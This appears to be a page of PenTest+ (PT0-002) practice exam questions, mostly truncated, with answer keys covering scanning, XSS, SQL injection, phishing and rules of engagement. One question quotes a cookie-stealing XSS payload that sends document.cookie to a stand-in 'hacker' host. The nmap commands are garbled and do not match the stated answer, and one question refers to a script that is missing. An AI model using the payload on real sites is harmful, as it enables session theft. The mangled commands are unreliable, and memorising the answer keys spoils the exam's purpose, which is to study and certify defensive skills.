PT0-002 exam

An Nmap network scan has found five open ports with identified services. Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports?A . OpenVASB . DrozerC . Burp SuiteD . OWASP ZAPView AnswerAnswer: A Explanation: OpenVAS...

Given the following code: <SCRIPT>var+img=new+Image();img.src=”http://hacker/%20+%20document.cookie;</SC RIPT> Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)A . Web-application firewallB . Parameterized queriesC . Output encodingD . Session tokensE . Input validationF . Base64 encodingView AnswerAnswer: C,E Explanation: Encoding (commonly called “Output Encoding”) involves...

A penetration tester writes the following script: Which of the following objectives is the tester attempting to achieve?A . Determine active hosts on the network.B . Set the TTL of ping packets for stealth.C . Fill the ARP table of the networked devices.D . Scan the system on the most...

A penetration tester downloaded the following Perl script that can be used to identify vulnerabilities in network switches. However, the script is not working properly. Which of the following changes should the tester apply to make the script work as intended?A . Change line 2 to $ip= 10.192.168.254;B . Remove...

A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?A . nmap192.168.1.1-5CPU22-25,80B . nmap192.168.1.1-5CPA22-25,80C . nmap192.168.1.1-5CPS22-25,80D . nmap192.168.1.1-5CSs22-25,80View AnswerAnswer: D Explanation: The -sS option in nmap is for SYN...

A penetration tester discovered that a client uses cloud mail as the company's email system. During the penetration test, the tester set up a fake cloud mail login page and sent all company employees an email that stated their inboxes were full and directed them to the fake login page...

A penetration tester found several critical SQL injection vulnerabilities during an assessment of a client's system. The tester would like to suggest mitigation to the client as soon as possible. Which of the following remediation techniques would be the BEST to recommend? (Choose two.)A . Closing open servicesB . Encryption...

A penetration tester is testing a new version of a mobile application in a sandbox environment. To intercept and decrypt the traffic between the application and the external API, the tester has created a private root CA and issued a certificate from it. Even though the tester installed the root...

A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees’ phone numbers on the company’s website, the tester has learned the complete phone catalog was published there a few months ago. In which of the following places should...

During a penetration test, the domain names, IP ranges, hosts, and applications are defined in the: A. SOW. B. SLA. C. ROE. D. NDAView AnswerAnswer: C Explanation: https://mainnerve.com/what-are-rules-of-engagement-in-pen-testing/#:~:text=The%20ROE%20includes%20the%20dates,limits%2C%20or%20out%20of %20scope.